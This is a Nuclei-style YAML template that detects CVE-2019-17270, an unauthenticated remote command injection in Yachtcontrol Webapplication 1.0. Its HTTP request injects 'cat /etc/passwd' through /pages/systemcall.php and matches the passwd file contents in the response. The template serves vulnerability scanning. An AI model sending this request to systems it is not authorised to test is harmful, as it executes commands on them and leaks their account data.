38 lines
1.3 KiB
YAML
38 lines
1.3 KiB
YAML
id: CVE-2019-17270
|
|
|
|
info:
|
|
name: Yachtcontrol Webapplication 1.0 - Remote Command Injection
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: |
|
|
Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/47760
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-17270
|
|
- http://packetstormsecurity.com/files/155582/Yachtcontrol-2019-10-06-Remote-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2019-17270
|
|
cwe-id: CWE-78
|
|
tags: rce,yachtcontrol,cve,cve2019,edb,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/16
|